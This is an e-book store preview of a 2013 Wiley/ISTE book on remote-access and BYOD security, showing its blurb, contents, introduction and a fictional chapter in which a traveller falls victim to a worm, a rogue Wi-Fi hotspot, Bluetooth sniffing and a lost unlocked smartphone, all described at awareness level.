139,99 €
Mehr erfahren.
- Herausgeber: John Wiley & Sons
- Kategorie: Wissenschaft und neue Technologien
- Sprache: Englisch
Over recent years, the amount of mobile equipment that needs to be connected to corporate networks remotely (smartphones, laptops, etc.) has increased rapidly. Innovative development perspectives and new tendencies such as BYOD (bring your own device) are exposing business information systems more than ever to various compromising threats. The safety control of remote access has become a strategic issue for all companies. This book reviews all the threats weighing on these remote access points, as well as the existing standards and specific countermeasures to protect companies, from both the technical and organizational points of view. It also reminds us that the organization of safety is a key element in the implementation of an efficient system of countermeasures as well. The authors also discuss the novelty of BYOD, its dangers and how to face them. Contents 1. An Ordinary Day in the Life of Mr. Rowley, or the Dangers of Virtualization and Mobility. 2.Threats and Attacks. 3. Technological Countermeasures. 4. Technological Countermeasures for Remote Access. 5. What Should Have Been Done to Make Sure Mr Rowley's Day Really Was Ordinary. About the Authors Dominique Assing is a senior security consultant and a specialist in the management and security of information systems in the banking and stock markets sectors. As a security architect and risk manager, he has made information security his field of expertise. Stephane Calé is security manager (CISSP) for a major automobile manufacturer and has more than 15 years of experience of putting in place telecommunications and security infrastructures in an international context.
Sie lesen das E-Book in den Legimi-Apps auf:
Seitenzahl: 285
Veröffentlichungsjahr: 2013
Ähnliche
Contents
Introduction
Chapter 1 An Ordinary Day in the Life of Mr. Rowley, or the Dangers of Virtualization and Mobility
1.1. A busy day
1.2. The ups and downs of the day
1.3. What actually happened?
Chapter 2 Threats and Attacks
2.1. Reconnaissance phase
2.2. Identity/authentication attack
2.3. Confidentiality attack
2.4. Availability attack
2.5. Attack on software integrity
2.6. BYOD: mixed-genre threats and attacks
2.7. Interception of GSM/GPRS/EDGE communications
Chapter 3 Technological Countermeasures
3.1. Prevention
3.2. Detection
3.3. Reaction
3.4. Organizing the information system’s security
Chapter 4 Technological Countermeasures for Remote Access
4.1. Remote connection solutions
4.2. Control of remote access
4.3. Architecture of remote access solutions
4.4. Control of conformity of the VPN infrastructure
4.5. Control of network admission
Chapter 5 What Should Have Been Done to Make Sure Mr Rowley’s Day Really Was Ordinary
5.1. The attack at Mr Rowley’s house
5.2. The attack at the airport VIP lounge while on the move
5.3. The attack at the café
5.4. The attack in the airport VIP lounge during Mr Rowley’s return journey
5.5. The loss of a smartphone and access to confidential data
5.6. Summary of the different security solutions that should have been implemented
Conclusion
APPENDICES
Appendix 1: Summary of Security Solutions
Appendix 2: Glossary
Bibliography
Index
First published 2013 in Great Britain and the United States by ISTE Ltd and John Wiley & Sons, Inc.
Apart from any fair dealing for the purposes of research or private study, or criticism or review, as permitted under the Copyright, Designs and Patents Act 1988, this publication may only be reproduced, stored or transmitted, in any form or by any means, with the prior permission in writing of the publishers, or in the case of reprographic reproduction in accordance with the terms and licenses issued by the CLA. Enquiries concerning reproduction outside these terms should be sent to the publishers at the undermentioned address:
ISTE Ltd
27-37 St George’s Road
London SW19 4EU
UK
www.iste.co.uk
John Wiley & Sons, Inc.
111 River Street
Hoboken, NJ 07030
USA
www.wiley.com
© ISTE Ltd 2013
The rights of Dominique Assing and Stéphane Calé to be identified as the author of this work have been asserted by them in accordance with the Copyright, Designs and Patents Act 1988.
Library of Congress Control Number: 2012951550
British Library Cataloguing-in-Publication Data
A CIP record for this book is available from the British Library
ISBN: 978-1-84821-435-4
Printed and bound in Great Britain by CPI Group (UK) Ltd., Croydon, Surrey CR0 4YY
Introduction
“With the Internet, to be competitive in the market is to communicate information to the outside world. It no longer consists of forbidding access to an organization’s data; it consists of mastering information exchange”.
Jean-Philippe Jouas (president of LUSIF)
Extract from 01 Informatique, 4
September 1998
Remote access has helped realize one of mankind’s most ancient dreams: “ubiquity”, because with these new technologies, employees can now access all their company’s resources, anywhere, at any time and from any device (PC, PDA, etc.)
This development of “nomadism” is linked to a number of technological improvements, such as the “democratization” of the cost of laptops and the proliferation of Internet access, which is now available even in the remotest of places. However, it also has its roots in economic factors such as the globalization forcing companies to be more efficient and responsive in order to survive in a highly competitive environment. The gains arising from the implementation of mobility solutions are indeed many and varied:
Unfortunately, the exponential growth of remote access has completely called into question companies’ security methods that have survived thus far. As in the Middle Ages, this mainly consists of building high perimeter walls to protect against attacks from assailants, and to strictly limit and control incomings and exchanges with the outside. But today, organizations’ physical boundaries are becoming more diffuse as the development of telework extends its geographical perimeter as well as the number of entry points. A veritable “Pandora’s box” has been opened by the growing use of remote access. Thus, one employee can potentially inadvertently contaminate the entire information system of their company by connecting, for example, from home with their personal computer that has been contaminated by their children while surfing illegal download sites. The evolution of organizations’ security policies is therefore vital.
Each security issue is unique, because such issues depend on the organization’s intended use for its remote access, as well as on its own specific limitations and constraints (financial, technical, etc.) For this reason, it is not possible for us to provide, as part of this work, a universal “recipe”. We will try, however, over the course of the following chapters, to give you some ideas, approaches, principles and techniques that will allow you to understand, on the one hand, the risks involved, and on the other, provide you with the means to build a security solution for your particular case.
Our aim is not to produce an exhaustive description of the various security issues and solutions concerning the mobile elements of companies, because as you will have gathered, such a task would require a much longer book. We have therefore chosen to adopt a didactic approach to make the reader aware of the various threats and protection solutions, by giving a concrete example based on an average user, and the various attacks suffered during a “typical day.”
Then, we place these attacks in the broader context of the different families of risk. This allows us to then present the tools capable of countering these attacks or limiting their effects.
Finally, we finish with our average user by explaining the protection solutions that should have been put in place to protect him. As the field of security is not solely related to technical issues, we conclude by making the link between the various recommendations with one of the main methodological approaches in this area (ISO/IEC 27002).
Chapter 1
An Ordinary Day in the Life of Mr. Rowley, or the Dangers of Virtualization and Mobility
“Appearances can be deceiving”
Proverb
1.1. A busy day
The day promised to be busy for Mr. Rowley. Upon awakening that morning, he knew it would be punctuated by unexpected events – as usual – but what they would be he didn’t know.
It all started after breakfast, when, after his son had already been surfing the Web, he decided to get on with preparing his annual report by logging onto his company’s fileserver from his personal computer. Thanks to the VPN1 Internet access solution which had been installed by his company, he could work from home as if he were in the office. What a gain in productivity! And it was so simple: all that he had needed to do was simply install a small software client on his PC and configure it appropriately.
Then, because his plane took off at 9am and he was worried there might be heavy traffic, Mr. Rowley hurried out of the house – and found himself at the airport more than three quarters of an hour before boarding. It was not a waste of time, though, since with his business class ticket, he had access to the VIP lounge. He took advantage of the opportunity to download his latest emails on his laptop, using the free Wi-Fi2 access to deal with them while he was travelling. These little desks for travelers to use were really useful. You could even leave your PC connected and downloading emails, and go to the café to enjoy a coffee and a pastry.
Two hours later, when he had arrived at his destination, Mr. Rowley had dealt with all his emails, and even slept for a little while.
It really was his lucky day. It took barely ten minutes from the airport by taxi to get to his client’s workplace. As it wasn’t the done thing to arrive at an appointment an hour early, he decided to wait in a small café at the foot of the building. This café also offered free Internet access via Wi-Fi, so our man took the opportunity to order, on an e-commerce site, a fashion doll that his daughter wanted for her birthday.
The meeting with his client went as hoped, and Mr. Rowley could finally close the deal on the new V91 model, which he had been working on for several weeks.
Back to the airport, and as he was early again, he made the most of the VIP lounge, and got on with some work. He took the opportunity to transfer the full list of contacts on his laptop to his new smartphone via Bluetooth3.
Finally, back at home, he was able to celebrate signing the contract with his little family, with a bottle of champagne.
Just before going to sleep, wanting to check his emails using his smartphone, Mr. Rowley made the unpleasant discovery of the disappearance of his precious device. It had slipped from his pocket in the taxi that took him home, without him having noticed. This perfect day ended on a negative note; he would have to replace it as soon as possible, and transfer his contacts from his PC again: a slight waste of time, but he thought no more of it.
1.2. The ups and downs of the day
Mr. Rowley was happy, because he had finally succeeded in convincing his client to sign the contract that was so important to his business, and which assured more than $50,000 of turnover in the coming months.
But he did not yet know, that on that day:
1.3. What actually happened?
While nothing in the eyes of Mr. Rowley could distinguish this day from so many others he had experienced in the course of his long business career, invisible and ill-intentioned individuals had made every effort to take advantage of his lack of knowledge of information security.
It all started when his son connected to a Website which had previously been attacked by a hacker. Upon visiting the site, a worm4 was automatically installed on Mr. Rowley’s personal computer via vulnerability in the operating system. The worm then took advantage of the IP tunnel that had been established with the company network to propagate there, significantly disrupting the functioning of the information system.
Then, at the airport, when Mr. Rowley left his PC unattended, an employee of a competitor who had recognized him, piqued by curiosity, decided to glance at his laptop. It was then that he recognized the plan for the launch of the new V91 model. The opportunity to obtain valuable information that might hamper the launch of the new product was too good to miss. All it took was to use a USB key to copy all of the desktop files on Mr. Rowley’s computer, in just a few seconds.
As for the Internet access point used in the café, it was not provided for customers by the owner, but had been installed by a hacker who knew that by placing a Wi-Fi router in a busy place, many victims could be snared. Those who believed they were connecting to popular Websites (eBay, Amazon, etc.) were unknowingly automatically redirected to a server maintained by an attacker. Taking advantage of this middleman position (see Section 2.2.4 Man in the middle) between the user and the e-commerce site, the attacker profited by collecting confidential information, including payment card details.
When Mr. Rowley synchronized his address book between his smartphone and his laptop, he had to input a matching PIN on both devices. But a hacker had installed a PC with Bluetooth sniffing software in the VIP lounge. He knew that this kind of place necessarily attracted people holding positions of responsibility, and therefore having easily marketable, confidential information. By analyzing the traffic exchanged between the PC and the smartphone, he could obtain some of the information necessary for authentication (IN_RAND5) and could determine the rest through a brute force attack (PIN6, BD_ADDR7) (see section 2.3.4. Cracking encrypted data). Once the authentication key had thus been obtained, it was not difficult to retrieve the desired information from Mr. Rowley’s mobile phone.
The bad luck of losing the smartphone in the taxi was the good luck of the next customer, who discovered it, and was even luckier to discover that no protection was in place to prevent access. Mr. Rowley had disabled his passcode protection, deciding that he was wasting too much time repeatedly typing it in.
Mr. Rowley’s misfortunes did not end there. Whoever had got their hands on the smartphone quickly realized the value of his discovery: all the emails, business contacts, meeting notes, tender offers in email attachments, etc. He knew enough people who would be very interested to know all this information – the world of business is sometimes very small!
Unfortunately what happened to our fictional character during this “very ordinary day” is only a small example of the many types of attacks experienced every day by companies which use mobility solutions. In Chapter 2, we present in detail the main types of threats you might encounter, so that you can better understand the scope of potential attacks, and the inventiveness of hackers.
1Virtual Private Network: virtual private networks typically exist over a public infrastructure such as the Internet, thanks to an encryption solution that ensures confidentiality of data exchange.
2Wireless Fidelity: Wireless Ethernet local area network technology, standardized by IEEE (802.11a, 802.11b, 802.11g, 802.11n).
3 Wireless communication technology (2.4 Ghz) invented in 1994 by the Ericsson company to facilitate exchange of information between devices over short distances.
4 A program that spreads from computer to computer by reproducing (duplicating) each time, using means as diverse as email, instant messaging, P2P networks, etc.
5 Random number used when creating the key for pairing Bluetooth devices.
6Personal Identification Number: numerical password used on mobile telephones.
7 Unique 48-bit address which identifies a Bluetooth device.
Chapter 2
Threats and Attacks
“Even the most improbable risk is possible”
Gérard Mestrallet (president of GDF-Suez)
It is impossible to list all the attacks with which mobile systems could one day be confronted because there are hundreds, with new ones appearing every week. We have therefore chosen to present the most important, to give you an idea of the techniques and methods that could be used by hackers against you, so that you can assess these threats and put in place appropriate protection measures.
To assist in your understanding, we have classed these threats into five broad categories:
Lesen Sie weiter in der vollständigen Ausgabe!
Lesen Sie weiter in der vollständigen Ausgabe!
Lesen Sie weiter in der vollständigen Ausgabe!
Lesen Sie weiter in der vollständigen Ausgabe!
Lesen Sie weiter in der vollständigen Ausgabe!
Lesen Sie weiter in der vollständigen Ausgabe!
Lesen Sie weiter in der vollständigen Ausgabe!
Lesen Sie weiter in der vollständigen Ausgabe!
Lesen Sie weiter in der vollständigen Ausgabe!
